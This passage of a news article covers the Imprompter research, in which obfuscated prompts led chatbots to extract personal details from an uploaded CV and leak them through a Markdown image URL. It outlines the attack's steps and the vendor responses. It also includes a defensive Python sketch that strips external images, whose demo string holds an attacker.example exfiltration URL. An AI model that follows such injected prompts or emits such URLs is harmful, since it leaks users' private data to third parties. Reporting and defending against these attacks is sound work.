The researchers say that if the attack were carried out in the real world, people could be socially engineered into believing that the unintelligible prompt might do something useful, such as improve their CV. They point to numerous websites that provide people with prompts they can use. They tested the attack by uploading a CV to conversations with chatbots, and it returned the personal information contained in the file.
Earlence Fernandes, an assistant professor at UCSD who was involved in the work, says the attack approach is fairly complicated, because the obfuscated prompt must identify personal information, form a working URL, apply Markdown syntax, and not reveal to the user that it is behaving nefariously. Fernandes likens the attack to malware, citing its ability to perform functions and behave in ways the user might not intend.
“Typically with traditional malware you can write a lot of computer code,” Fernandes says. “But what I think is cool here is that it can all be wrapped up in this relatively short, gibberish prompt.”
A Mistral AI spokesperson says the company welcomes security researchers helping it make its products safer for users. “In response to these comments, Mistral AI immediately implemented appropriate remedial measures to rectify the situation,” the spokesperson says. The company treated the issue as “moderately serious,” and its fix prevents the Markdown renderer from operating and calling an external URL in the process, so loading an external image is no longer possible.
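To make the idea behind that kind of fix concrete, here is a minimal sketch in Python of one way a chat interface could refuse to render Markdown images that point at external hosts. It is not Mistral AI's actual implementation, which the company has not described in detail here. The function name `strip_external_images`, the allowlist `ALLOWED_IMAGE_HOSTS`, and the host `cdn.example.com` are hypothetical, and the regular expression only covers simple inline image syntax, not reference-style images or URLs containing parentheses.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist: hosts the chat UI is permitted to load images from.
ALLOWED_IMAGE_HOSTS = {"cdn.example.com"}

# Matches simple inline Markdown images: ![alt](url "optional title")
IMAGE_PATTERN = re.compile(r'!\[([^\]]*)\]\(\s*([^)\s]+)[^)]*\)')


def strip_external_images(markdown_text: str) -> str:
    """Replace Markdown images whose host is not allowlisted with a text note.

    Relative URLs have no hostname, so they are removed as well.
    """
    def replace(match: re.Match) -> str:
        alt_text, url = match.group(1), match.group(2)
        host = urlparse(url).hostname
        if host in ALLOWED_IMAGE_HOSTS:
            return match.group(0)  # keep trusted images untouched
        return f"[image removed: {alt_text}]"

    return IMAGE_PATTERN.sub(replace, markdown_text)


if __name__ == "__main__":
    reply = "Done! ![status](https://attacker.example/p.png?q=name%3DJane)"
    print(strip_external_images(reply))
```

Because the image is never fetched, any data a malicious prompt packed into the URL is never sent to the outside server. The trade-off is the one Fernandes raises: the assistant also loses a legitimate capability.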
Fernandes believes the Mistral AI update is probably one of the first cases in which an adversarial prompt example led to a fix in the LLM product itself, rather than the attack being stopped by filtering out the prompt. However, he believes that limiting the capabilities of LLM agents could be counterproductive in the long run.
Meanwhile, a statement from the creators of ChatGLM says the company has security measures in place to help protect users’ privacy. “Our model is secure and we have always attached great importance to model security and privacy protection,” the statement reads. “By making our model open source, we want to leverage the power of the open source community to better control and analyze all aspects of these models’ capabilities, including their security.”
“High Risk Activities”
Dan McInerney, principal threat researcher at security firm Protect AI, says the Imprompter paper releases an algorithm for automatically creating prompts that can be used in prompt injection to carry out a variety of exploits, such as extracting PII, misclassifying images, or maliciously using the tools an LLM agent can access. While many of the attack types in the study may resemble previous methods, McInerney says, the algorithm ties them together. “This is more like improving automated LLM attacks than revealing undiscovered threats within them.”
But he adds that as LLM agents become more common and people give them more authority to take action on their behalf, the scope for attacks on them increases. “Releasing an LLM agent that accepts arbitrary user input should be considered a high-risk activity that requires significant and creative security testing before deployment,” McInerney says.
For companies, this means understanding how an AI agent can interact with data and how it can be abused. For individuals, as with common security advice, you should consider how much information you give to any AI-powered app or company, and if you use prompts from the internet, be careful where they come from.
